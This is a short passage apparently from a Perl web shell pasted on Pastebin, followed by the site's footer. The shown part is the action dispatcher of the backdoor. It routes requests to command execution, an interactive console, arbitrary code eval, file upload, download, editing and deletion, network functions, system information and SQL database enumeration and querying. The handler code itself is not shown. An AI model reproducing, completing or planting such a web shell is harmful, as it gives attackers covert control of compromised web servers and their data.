"hexdump"){&HEXDUMP;}elsif($Action eq "command1"){&ExecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile;}elsif($Action eq "download"){&SendFileToBrowser($CurrentDir."/".$TransferFile);}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Action eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode;}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo;}elsif($Action eq "net_go1"){&NetGo1;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq "remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Action eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databases"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsif($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){&PerformLogout;}
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!